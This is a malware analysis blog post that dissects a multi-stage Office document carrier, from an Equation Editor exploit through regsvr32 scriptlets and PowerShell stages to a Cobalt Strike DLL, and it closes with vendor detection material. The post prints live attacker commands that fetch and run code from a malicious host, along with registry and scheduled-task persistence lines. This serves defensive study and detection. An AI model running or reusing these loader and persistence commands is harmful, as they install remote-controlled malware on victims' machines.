Walkthrough of a Common Malware Carrier

Posted on 2018-04-19 by Pedram Amini

E-mail is a prominent vector for malware delivery, by way of malicious URLs or file attachments. When embedding malicious content within a file, malware authors commonly nest a variety of formats within one another and pivot through numerous stages of payloads before retrieving the final one. In this post, we'll walk through the dissection of a common document malware carrier.

The sample we'll dive into first popped up on our radar a week ago, on Thursday, April 12th, 2018, through one of our VirusTotal Intelligence YARA hunt rules that searches for suspicious Office documents with an external reference (more on this in a second). A Tweet from @blu3_team a few hours ago succinctly illustrated the behavior of this common carrier type; here we'll dive deeper with a step-by-step analysis. We've made the original sample, subsequent stage payloads, and some intermediary files available on our GitHub, InQuest/malware-samples. The initial malicious document:

On initial upload last week there were only three AV hits on the sample (Kaspersky, ZoneAlarm, and Zoner). Today, upon subsequent rescan, there were six:

On 4/12 the detection ratio was 3/59; on 4/19 it is 6/59.

The file is a Microsoft Office .docx file, which means you can simply rename it to .zip to extract and inspect the contents. Let's grep out the URLs, ignoring some common domains we don't care about:

$ grep -rEo '(http|https)://[^"]+' * | cut -d':' -f2- | grep -Ev "adobe.com|w3.org|openxmlformats.org|microsoft.com" | sort | uniq
http://job.softline.top/banner.jpg
http://purl.org/dc/dcmitype/
http://purl.org/dc/elements/1.1/
http://purl.org/dc/terms/

That first one pops out immediately. Let's see which file contains that particular URL and then inspect the file in its entirety:

$ grep -lr http://job.softline.top/banner.jpg
word/_rels/webSettings.xml.rels

$ cat word/_rels/webSettings.xml.rels
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships
xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/frame" Target="http://job.softline.top/banner.jpg" TargetMode="External"/>
</Relationships>
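
The rename, extract, and grep steps above can also be scripted. The following is a minimal sketch, assuming Python 3 and only the standard library: it opens the .docx directly as a ZIP archive and lists every relationship marked TargetMode="External". The function name external_targets and the sample.docx filename are our own illustrative choices, not part of any tool used in this post.

```python
import zipfile
import xml.etree.ElementTree as ET

# XML namespace used by OOXML relationship parts (*.rels).
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"

def external_targets(docx):
    """Yield (part name, relationship type, target) for external relationships.

    `docx` may be a path or a binary file-like object; no renaming to .zip needed.
    """
    with zipfile.ZipFile(docx) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") == "External":
                    yield name, rel.get("Type"), rel.get("Target")

# Hypothetical usage:
#   for part, rel_type, target in external_targets("sample.docx"):
#       print(part, rel_type.rsplit("/", 1)[-1], target)
```

Parsing the relationship parts rather than grepping avoids the need for a domain whitelist, since schema namespace URLs never appear as external targets.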

There's the external reference we were alluding to earlier. At this point, a user will have opened the initial carrier and activated this reference. Retrieving the next stage payload banner.jpg, you'll immediately notice the file is actually an RTF document and not a JPG image. We'll use rtfobj to dissect this further by requesting it dump all the objects out of the RTF stream:

$ rtfobj -s all banner.jpg -d objects
rtfobj 0.51 - http://decalage.info/python/oletools
THIS IS WORK IN PROGRESS - Check updates regularly!
Please report any issue at https://github.com/decalage2/oletools/issues

===============================================================================
File: 'banner.jpg' - size: 108109 bytes
---+----------+-------------------------------+-------------------------------
id |index     |OLE Object                     |OLE Package
---+----------+-------------------------------+-------------------------------
0  |0000ED3Ah |format_id: 2 (Embedded)        |Not an OLE Package
   |          |class name: 'Equation.3'       |
   |          |data size: 3072                |
---+----------+-------------------------------+-------------------------------
1  |00010E11h |format_id: 2 (Embedded)        |Not an OLE Package
   |          |class name: 'Equation.3'       |
   |          |data size: 3072                |
---+----------+-------------------------------+-------------------------------

Saving file embedded in OLE object #0:
  format_id  = 2
  class name = 'Equation.3'
  data size  = 3072
  saving to file objects/banner.jpg_object_0000ED3A.bin

Saving file embedded in OLE object #1:
  format_id  = 2
  class name = 'Equation.3'
  data size  = 3072
  saving to file objects/banner.jpg_object_00010E11.bin

$ file *
banner.jpg_object_0000ED3A.bin: Composite Document File V2 Document, Cannot read section info
banner.jpg_object_00010E11.bin: Composite Document File V2 Document, Cannot read section info
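
Both identifications so far (banner.jpg being an RTF document rather than an image, and the dumped objects being CDF) come down to the leading "magic" bytes of each file. As a rough sketch, assuming Python 3, the same check can be made without trusting the file extension. The signature table below is deliberately tiny and the sniff helper is hypothetical; the file utility knows far more formats.

```python
# Leading bytes of the formats encountered in this walkthrough.
MAGIC = [
    (b"{\\rt", "RTF document"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "Composite Document File V2 (OLE2)"),
    (b"PK\x03\x04", "ZIP archive (including OOXML such as .docx)"),
    (b"\xff\xd8\xff", "JPEG image"),
    (b"MZ", "DOS/Windows executable"),
]

def sniff(data):
    """Return a format name based on leading bytes, ignoring any file extension."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "unknown"

# Hypothetical usage:
#   with open("banner.jpg", "rb") as fh:
#       print(sniff(fh.read(16)))
```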

Two Composite Document Files (CDF). We'll use oledump to list the streams in both of the dumped objects banner.jpg_object_0000ED3A.bin and banner.jpg_object_00010E11.bin:

$ oledump.py banner.jpg_object_0000ED3A.bin
  1:       102 '\x01CompObj'
  2:        20 '\x01Ole'
  3:         6 '\x03ObjInfo'
  4:       197 'Equation Native'

$ oledump.py banner.jpg_object_00010E11.bin
  1:       102 '\x01CompObj'
  2:        20 '\x01Ole'
  3:         6 '\x03ObjInfo'
  4:       197 'Equation Native'

Each dumped object contains an "Equation Native" stream. These OLE streams contain exploits for the Microsoft Equation Editor vulnerabilities described in CVE-2017-11882 and CVE-2018-0802. For an example proof-of-concept exploit, see github/rxwx/CVE-2018-0802. Let's dump each of those streams:

$ oledump.py banner.jpg_object_0000ED3A.bin -s4
00000000: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00  ................
00000010: C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03  ..\...[.........
00000020: 0A 0A 01 08 5A 5A 33 C0 99 B2 02 C1 E2 08 2B E2  ....ZZ3.......+.
00000030: E8 FF FF FF FF C3 5B 50 64 8B 40 30 8B 40 08 99  ......[Pd.@0.@..
00000040: B2 03 C1 E2 10 66 BA 12 0C 03 C2 8D 5B 1C 53 FF  .....f......[.S.
00000050: E0 72 65 67 73 76 72 33 32 20 2F 75 20 2F 73 20  .regsvr32 /u /s
00000060: 2F 69 3A 68 74 74 70 3A 2F 2F 6A 6F 62 2E 73 6F  /i:http://job.so
00000070: 66 74 6C 69 6E 65 2E 74 6F 70 2F 61 64 31 2E 6A  ftline.top/ad1.j
00000080: 70 67 20 73 63 72 6F 62 6A 2E 64 6C 6C 20 23 20  pg scrobj.dll #
00000090: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000000A0: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
000000B0: 20 20 20 20 20 20 20 20 20 20 25 00 00 00 00 00            %.....
000000C0: 00 00 00 00 00

$ oledump.py banner.jpg_object_00010E11.bin -s4
00000000: 1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00  ................
00000010: C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03  ..\...[.........
00000020: 0A 0A 01 08 5A 5A B8 44 EB 71 12 BA 78 56 34 12  ....ZZ.D.q..xV4.
00000030: 31 D0 8B 08 8B 09 8B 09 66 83 C1 3C 31 DB 53 51  1.......f..<1.SQ
00000040: BE 64 3E 72 12 31 D6 FF 16 53 66 83 EE 4C FF 10  .d>r.1...Sf..L..
00000050: 90 90 14 21 40 00 00 00 72 65 67 73 76 72 33 32  ...!@...regsvr32
00000060: 20 2F 75 20 2F 73 20 2F 69 3A 68 74 74 70 3A 2F   /u /s /i:http:/
00000070: 2F 6A 6F 62 2E 73 6F 66 74 6C 69 6E 65 2E 74 6F  /job.softline.to
00000080: 70 2F 61 64 31 2E 6A 70 67 20 73 63 72 6F 62 6A  p/ad1.jpg scrobj
00000090: 2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00  .dll............
000000A0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000B0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
000000C0: 00 00 00 00 00                                   .....
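
The embedded command is readable straight from the ASCII column of the dumps above. To pull it out programmatically, a strings-style scan is usually enough. Here is a minimal sketch, assuming Python 3; the bytes are transcribed from offsets 0x50 through 0x9F of the second dump, and the ascii_strings helper is our own illustration rather than part of oledump.

```python
import re

# Offsets 0x50-0x9F of the 'Equation Native' stream in the second object,
# transcribed from the hex dump above.
TAIL = bytes.fromhex(
    "90 90 14 21 40 00 00 00 72 65 67 73 76 72 33 32 "
    "20 2F 75 20 2F 73 20 2F 69 3A 68 74 74 70 3A 2F "
    "2F 6A 6F 62 2E 73 6F 66 74 6C 69 6E 65 2E 74 6F "
    "70 2F 61 64 31 2E 6A 70 67 20 73 63 72 6F 62 6A "
    "2E 64 6C 6C 00 00 00 00 00 00 00 00 00 00 00 00 "
)

def ascii_strings(data, min_len=8):
    """Return printable-ASCII runs of at least min_len bytes, like strings(1)."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [run.decode("ascii") for run in re.findall(pattern, data)]

for s in ascii_strings(TAIL):
    print(s)
```

The minimum length of 8 is an arbitrary choice that filters out short printable runs inside the shellcode, such as the "!@" just before the command.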

We'll focus on the first of the two, banner.jpg_object_0000ED3A.bin. For further reading on the specifics of the Equation Editor vulnerabilities, we recommend the following articles from Check Point and Freebuf. Aligning the vulnerable structure with the data above, we have the following table:

struct member   description       size                           offset
Tag             0x08              1 byte                         0x23
Ttype           Typeface number   1 byte                         0x24
Style           Font style        1 byte                         0x25
Name            Font name         NULL-terminated ASCII string   0x26 - 0x93
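
To make the alignment concrete, here is a small sketch, assuming Python 3, that slices the first object's "Equation Native" stream at the offsets listed in the table. The bytes are transcribed from offsets 0x00 through 0x9F of the first dump; the parse_font_record helper and its default offsets are our own illustration and simply reuse the table's values rather than walking the record structure properly.

```python
import struct

# Offsets 0x00-0x9F of the 'Equation Native' stream in the first object,
# transcribed from the hex dump above.
STREAM = bytes.fromhex("""
    1C 00 00 00 02 00 9E C4 A9 00 00 00 00 00 00 00
    C8 A7 5C 00 C4 EE 5B 00 00 00 00 00 03 01 01 03
    0A 0A 01 08 5A 5A 33 C0 99 B2 02 C1 E2 08 2B E2
    E8 FF FF FF FF C3 5B 50 64 8B 40 30 8B 40 08 99
    B2 03 C1 E2 10 66 BA 12 0C 03 C2 8D 5B 1C 53 FF
    E0 72 65 67 73 76 72 33 32 20 2F 75 20 2F 73 20
    2F 69 3A 68 74 74 70 3A 2F 2F 6A 6F 62 2E 73 6F
    66 74 6C 69 6E 65 2E 74 6F 70 2F 61 64 31 2E 6A
    70 67 20 73 63 72 6F 62 6A 2E 64 6C 6C 20 23 20
    20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
""")

def parse_font_record(stream, offset=0x23, name_end=0x93):
    """Slice the font record using the table's offsets (assumed, not derived)."""
    tag, typeface, style = struct.unpack_from("<BBB", stream, offset)
    name = stream[offset + 3 : name_end + 1]
    return {"tag": tag, "typeface": typeface, "style": style, "name": name}

record = parse_font_record(STREAM)
print(hex(record["tag"]), hex(record["typeface"]), hex(record["style"]))
print(len(record["name"]), "bytes in the font name field")
```

The point of the exercise is that the "font name" is nothing like a font name: it carries the shellcode followed by the regsvr32 command line.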

The vulnerability was initially patched in November 2017. That patch proved insufficient, and in January 2018 Microsoft simply removed the Equation Editor in its entirety. The above analysis of course can be skipped entirely, as the next stage payload is clearly visible in both objects referencing ad1.jpg, which contains nothing more than a scriptlet pivot through JavaScript and PowerShell to yet another payload:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">
        <![CDATA[
            ps  = "powershell.exe -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/share.png')";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>
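
When chasing pivots like this one by hand gets tedious, the next-stage URL can be lifted with a regular expression. The sketch below assumes Python 3; next_stage_urls is a hypothetical helper of ours. We use a regex rather than an XML parser on purpose, since a strict parser may reject the upper-case <?XML declaration that these scriptlets tend to carry.

```python
import re

# The script line from the ad1.jpg scriptlet shown above.
SCRIPTLET = """
ps  = "powershell.exe -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/share.png')";
new ActiveXObject("WScript.Shell").Run(ps,0,true);
"""

# Stop at whitespace, quotes, angle brackets, or a closing parenthesis.
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")

def next_stage_urls(text):
    """Return URLs found in text, de-duplicated, in order of first appearance."""
    seen = []
    for url in URL_RE.findall(text):
        if url not in seen:
            seen.append(url)
    return seen

print(next_stage_urls(SCRIPTLET))
```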

Following the rabbit down the hole further, we get the following PowerShell pivot from share.png:

function ConvertFrom-Base64($string) {
   $bytes  = [System.Convert]::FromBase64String($string);
   $decoded = [System.Text.Encoding]::UTF8.GetString($bytes);
   return $decoded;
}

$WSH = New-Object -Com WScript.Shell;
$decode = ConvertFrom-Base64("c2NodGFza3MgL2NyZWF0ZSAvdG4gIndpbmRvd3MgdXBkYXRlIiAvdHIgInJlZ3N2cjMyIC91IC9zIC9pOmh0dHA6Ly9qb2Iuc29mdGxpbmUudG9wL2FkMi5qcGcgc2Nyb2JqLmRsbCIgL3NjIGRhaWx5IC9zdCAxMjowMCAvRg==");
$WSH.Run($decode,0);

$client = new-object System.Net.WebClient
$client.DownloadFile('http://job.softline.top/SCHEDLGU.exe', 'c:\\windows\\tasks\\SCHEDLGU.exe')
$decode3 = ConvertFrom-Base64("cmVnIGFkZCAiSEtFWV9DVVJSRU5UX1VTRVJcU29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuIiAvdiAid2luZG93cyB0YXNrcyBjaGVjayIgL3QgUkVHX1NaIC9kICJjOlx3aW5kb3dzXHRhc2tzXFNDSEVETEdVLmV4ZSIgL2Y=");
$WSH.Run($decode3,0);

$decode2 = ConvertFrom-Base64("cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1XaW5kb3dzdHlsZSBoaWRkZW4gLW5vbmludGVyYWN0aXZlIC1ub2xvZ28gSUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vam9iLnNvZnRsaW5lLnRvcC9sb2FkaW5nbGl0LmdpZicp");
$WSH.Run($decode2,0);

There's a plethora of ways to decode the base64 data above, but sticking with the tool-set we've been using, we'll lean on base64dump here:

$ base64dump.py -n30 share.png -s a -S
schtasks /create /tn "windows update" /tr "regsvr32 /u /s /i:http://job.softline.top/ad2.jpg scrobj.dll" /sc daily /st 12:00 /F

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "windows tasks check" /t REG_SZ /d "c:\windows\tasks\SCHEDLGU.exe" /f

powershell.exe -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/loadinglit.gif')
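
As one of those many alternatives, the same decoding can be done in a few lines of Python 3 by mirroring the script's own ConvertFrom-Base64 helper (base64 to bytes, bytes to UTF-8). This is only a sketch: decode_commands is our own name, and for brevity the snippet carries just the first of the three encoded strings from share.png.

```python
import base64
import re

# First encoded command from share.png, copied verbatim from the script above.
SNIPPET = (
    '$decode = ConvertFrom-Base64("c2NodGFza3MgL2NyZWF0ZSAvdG4gIndpbmRvd3MgdXBkYXRlIiAvdHIg'
    'InJlZ3N2cjMyIC91IC9zIC9pOmh0dHA6Ly9qb2Iuc29mdGxpbmUudG9wL2FkMi5qcGcgc2Nyb2JqLmRsbCIg'
    'L3NjIGRhaWx5IC9zdCAxMjowMCAvRg==");'
)

# Capture the quoted argument of every ConvertFrom-Base64("...") call.
B64_ARG = re.compile(r'ConvertFrom-Base64\("([A-Za-z0-9+/=]+)"\)')

def decode_commands(script):
    """Decode each ConvertFrom-Base64 argument the same way the script does."""
    return [base64.b64decode(arg).decode("utf-8") for arg in B64_ARG.findall(script)]

for command in decode_commands(SNIPPET):
    print(command)
```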

Three commands. It looks to pull down a payload and to establish persistence across reboots by way of a Registry run-key and scheduled tasks (how uncreative). Additionally, we've got a pair of new pivots to follow here. As it turns out, ad2.jpg is nothing more than a JavaScript / PowerShell pivot to loadinglit.gif:

<?XML version="1.0"?>
<scriptlet>
<registration
    progid="ShortJSRAT"
    classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">
        <![CDATA[
            ps  = "powershell.exe -exec bypass -Windowstyle hidden -noninteractive -nologo IEX (New-Object Net.WebClient).DownloadString('http://job.softline.top/loadinglit.gif')";
            new ActiveXObject("WScript.Shell").Run(ps,0,true);
        ]]>
</script>
</registration>
</scriptlet>

Examining loadinglit.gif we find a pure PowerShell payload that contains a base64 encoded PE file. This is obvious from the string start of "TVroAAAAAFt" which, if you've been looking at these things long enough, immediately stands out as an MZ header for a Windows PE executable (DLL, EXE, etc.). The script is too large to include inline, see the link above. Again though, we'll lean on base64dump to extract the payload:

$ base64dump.py -n500 loadinglit.gif
ID  Size    Encoded          Decoded          MD5 decoded
--  ----    -------          -------          -----------
 1:  275804 TVroAAAAAFtSRVWJ MZ�....[REU���r 9d7376f5ad1b39ec08cbe2a8e0e886b6

$ base64dump.py -n500 loadinglit.gif -s1 -d > payload

$ sha256sum payload
8cdd29e28daf040965d4cad8bf3c73d00dde3f2968bab44c7d8fe482ba2057f9  payload

$ file payload
payload: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
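
The "TVro" prefix stands out because base64 maps every three input bytes to four output characters, so any blob beginning with the bytes 4D 5A ("MZ") encodes to something starting with "TV". A rough Python 3 sketch of the carving step follows; carve_pe is a hypothetical helper, the 16-character minimum is arbitrary, and SAMPLE holds only the 16-character prefix shown in the base64dump listing above, not the full payload.

```python
import base64
import hashlib
import re

# Runs of base64 alphabet characters, optionally followed by padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

def carve_pe(text):
    """Yield decoded base64 blobs in text that begin with the 'MZ' signature."""
    for match in B64_RUN.finditer(text):
        blob = match.group(0)
        blob = blob[: len(blob) - len(blob) % 4]  # keep whole 4-character groups
        try:
            data = base64.b64decode(blob)
        except ValueError:
            continue
        if data.startswith(b"MZ"):
            yield data

# Only the prefix from the listing above; the real script embeds ~275 KB.
SAMPLE = '$payload = "TVroAAAAAFtSRVWJ"'
for pe in carve_pe(SAMPLE):
    print(len(pe), pe[:2], hashlib.sha256(pe).hexdigest())
```

Run against the complete loadinglit.gif, the digest printed for the carved blob would be the value to compare against the sha256sum output above.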

This final payload had not been seen on VT / MetaDefender before, so we uploaded it to both services. It appears to be a Cobalt Strike payload:

Detection

We've examined the various pivots in this malware carrier that resulted in the eventual delivery of a persistently hooked malicious binary. The InQuest Deep File Inspection (DFI) stack is capable of unraveling common malware carriers such as the one detailed in this post. There are countless methods that attackers can employ to obfuscate, evade, encapsulate, and generally deter security inspection. Our DFI stack strips away the superfluous and exposes malicious content bare for threat detection based on any of our 1000+ field tested hunting signatures, user-defined YARA signatures, or any of our active integrations.

Malware carriers are typically nested in multiple levels, like a Matryoshka doll.

In addition to Deep File Inspection, we provide other capabilities for discovering and detecting targeted malware campaigns. Following along with our example, let's take a look at the hosting provider behind the various payload stages we retrieved. The domain, softline.top (WHOIS), was registered in late December of last year. There is no DNS resolution for the domain itself. The subdomain job.softline.top is hosted on South Korean IP address 27.255.90.218 (WHOIS):

$ whois softline.top
...
Domain Name: softline.top
Registry Domain ID: D20171226G10001G_32819662-top
Registrar WHOIS Server: whois.publicdomainregistry.com
Registrar URL: http://publicdomainregistry.com
Updated Date: 2017-12-26T08:51:22Z
Creation Date: 2017-12-26T08:50:51Z
Registry Expiry Date: 2018-12-26T08:50:51Z
Registrar: PDR Ltd
Registrar IANA ID: 303
...

$ dig job.softline.top any
...
;; ANSWER SECTION:
job.softline.top. 51  IN  A 27.255.90.218
...

A reverse IP lookup on 27.255.90.218 reveals another domain, microsoftgood.com (WHOIS), which was registered even more recently:

$ whois microsoftgood.com
...
Domain Name: microsoftgood.com
Registry Domain ID: 2221771516_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: http://www.godaddy.com
Updated Date: 2018-02-01T02:55:46Z
Creation Date: 2018-02-01T02:55:46Z
Registrar Registration Expiration Date: 2019-02-01T02:55:46Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
...
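
Registration recency is easy to quantify from the WHOIS output. As a small sketch, assuming Python 3, the helper below pulls the "Creation Date" field and computes each domain's age on the day the sample first surfaced (2018-04-12). The function names are ours, and real WHOIS output varies by registry, so the regular expression is only known to fit the two records shown above.

```python
import re
from datetime import date

# Creation dates copied from the two WHOIS records above.
WHOIS = {
    "softline.top": "Creation Date: 2017-12-26T08:50:51Z",
    "microsoftgood.com": "Creation Date: 2018-02-01T02:55:46Z",
}

def creation_date(whois_text):
    """Return the registration date from WHOIS text, or None if absent."""
    m = re.search(r"Creation Date:\s*(\d{4})-(\d{2})-(\d{2})", whois_text)
    return date(*map(int, m.groups())) if m else None

def age_in_days(whois_text, observed):
    """Return whole days between registration and the observation date."""
    created = creation_date(whois_text)
    return None if created is None else (observed - created).days

first_seen = date(2018, 4, 12)  # day the carrier hit our hunt rule
for domain, record in WHOIS.items():
    print(domain, age_in_days(record, first_seen), "days old")
```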

Whether or not there is any relation is speculative at this point. It may be worthwhile, from a defender's perspective, to use the naming patterns gleaned above to conduct a limited brute force crawl of this new domain in search of additional malware.
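
As a sketch of what such a limited crawl list might look like, assuming Python 3, the helper below expands the file names seen in this campaign into candidate URLs for another host. Everything here is hypothetical: the candidates function is ours, the choice to number names like ad1.jpg up to a small limit is a guess at the actor's pattern, and whether payloads would sit on the bare domain or on a subdomain is unknown. The code only builds the list; it does not fetch anything.

```python
import re

# File names observed across the stages of this carrier.
OBSERVED = ["banner.jpg", "ad1.jpg", "ad2.jpg", "share.png",
            "loadinglit.gif", "SCHEDLGU.exe"]

def candidates(host, names, max_n=5):
    """Build candidate URLs, expanding names ending in a number to 1..max_n."""
    urls = []
    for name in names:
        m = re.fullmatch(r"(.*?)(\d+)(\.\w+)", name)
        if m:
            variants = [f"{m.group(1)}{i}{m.group(3)}" for i in range(1, max_n + 1)]
        else:
            variants = [name]
        for variant in variants:
            url = f"http://{host}/{variant}"
            if url not in urls:  # ad1.jpg and ad2.jpg expand to the same set
                urls.append(url)
    return urls

for url in candidates("microsoftgood.com", OBSERVED, max_n=3):
    print(url)
```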

IP and DNS are both detectable / alertable artifacts within InQuest. Users can lean on our weekly feed of intel updates as well as integrate with their own proprietary intel or commercial third-party feeds to detect command and control (C2) activity. Campaigns can be alerted on by file heuristics, communicated endpoints, hashes, fuzzy hashes, perceptual hashes (images), header (HTTP and SMTP) analytics, and an ever-growing list of active integrations.

As an example active integration, let's take a look at how our friends at VMRay detect this threat. If enabled, file artifacts carved by InQuest from the wire can be passed through the VMRay sandbox for detonation and behavioral inspection:

VMRay detonated the file in four different environments, only one alerted.

Starting from the overview, you'll note that VMRay detonated the file in four different environments, only one of which alerted. It pays to build your sandbox environment to accurately reflect your real-world systems. The next screen shows the process overview:

Clear depiction of the multiple stage pivots detailed above.

You can clearly see some of the pivots we detailed above: from Microsoft Word through the RTF payload (banner.jpg) to the Equation Editor pivot, through regsvr32.exe (ad1.jpg), and finally to PowerShell. Some of the scriptlets in-between are not depicted here, though they are captured and scored independently in InQuest. There's value in defense-in-depth. A more detailed but similar view:

Detailed information on various commands executed by the malware.

This view shows the complete command line arguments from those captured pivots. The results from this, and any other integrations, are aggregated under a single pane of glass and summarized by a simple threat score from 1 to 10. Our threat score algorithm is not prone to artificial inflation from over-detection. We lean on our experiences as SOC analysts to automate the heating / cooling of scores based on a combination of inputs. In essence, we're automating much of the SOC analyst workflow to spare precious human cycles for what matters most. The key decision points that drive the algorithm are shown in a straightforward threat receipt:

There are over 20 factors considered when applying a threat score to a captured session.

The indicators beside each row in the threat receipt state:

  • Green, the subsystem alerted and contributed to the threat score.
  • Yellow, the subsystem alerted but that alert did not contribute to the threat score.
  • Red, the subsystem did not produce an alert.
  • Grey, the subsystem was not available at the time of analysis (or is not configured / enabled).

At a glance, the InQuest threat receipt provides analysts with an idea as to whether or not the threat is a true positive and why. In this particular case the InQuest Threat Detection Engine scored the session containing the initial carrier as a 9 and then bumped the score to a 10 based on InQuest cloud assisted IP reputation. Both the OPSWAT (multi-av) and VMRay (sandbox / detonation) subsystems alerted as well, but did not alter the final score.

On a final note, InQuest customers can hunt for signs of this and similar campaigns via the following DFI powered signatures:

  • 5000755, MC_CVE_2017_11882_OLE, severity 8, confidence 7.
  • 5000757, MC_Equation_OLE, severity 8, confidence 7.
  • 5000806, MC_Malicious_Scriptlet_Payload_01, severity 10, confidence 5.
  • 5000487, MC_SCT_Backdoor, severity 9, confidence 9.
  • 3000175, SC_RTF_Objupdate, severity 5, confidence 2.
